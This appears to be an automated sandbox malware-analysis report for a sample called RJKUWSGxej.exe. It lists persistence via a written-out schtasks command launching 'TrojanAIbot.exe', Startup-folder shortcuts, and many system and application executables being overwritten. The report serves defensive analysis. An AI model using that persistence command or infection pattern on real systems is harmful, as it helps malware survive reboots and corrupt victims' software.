Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\RJKUWSGxej.exe

File created: C:\Users\user\RJKUWSGxej.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 10:06 /du 23:59 /sc daily /ri 1 /f

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

Code function: 5_2_0317CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

5_2_0317CBD0

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Writes data at the end of the disk (often used by bootkits to hide malicious code)

Source: C:\Users\user\Desktop\RJKUWSGxej.exe	File written: C:\Users\user\RJKUWSGxej.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4epfqf5y.ttm.ps1 offset: 0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onejnghs.cdy.psm1 offset: 0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwbs0lqg.apu.ps1 offset: 0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfkscmkb.upb.psm1 offset: 0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File written: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Local\Temp\server_BTC.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Local\Temp\server_BTC.exe offset: 229376	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Roaming\3b4327877d6689f.bin offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 162304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735820	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 737280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1285120	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1286144	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 1289427	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 735744	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 31704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 95744	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 669260	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 672768	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 1220608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 1221632	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 1224840	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 669184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 53125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\alg.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 767488	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1341004	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1344512	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1347720	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 1340928	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 409168	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\AppVClient.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Local\Temp\neworigin.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Local\Temp\neworigin.exe offset: 249856	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 94208	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667724	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Local\Temp\build.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Users\user\AppData\Local\Temp\build.exe offset: 307200	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 671232	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1219072	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1220096	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 1223304	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 667648	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 50277	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe	File written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Windows\System32\config\systemprofile\AppData\Roaming\3b4327877d6689f.bin offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 1792000	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365516	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 2365440	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 777420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 1776128	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349644	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 2349568	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 677164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 557056	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130572	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 1130496	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 382726	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7z.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 952832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 1526272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 614020	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zFM.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 700416	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273932	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 1273856	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 464916	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\7zG.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 14848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 588288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 5610	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\7-Zip\Uninstall.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 5630464	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 6203904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 3201596	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 27136	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600652	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 600576	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 8988	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 31744	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605260	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 605184	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 12684	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 332800	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906316	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 906240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 232412	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 3571200	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 4144640	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 1485948	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59362816	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936332	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 59936256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe offset: 140924	Jump to behavior
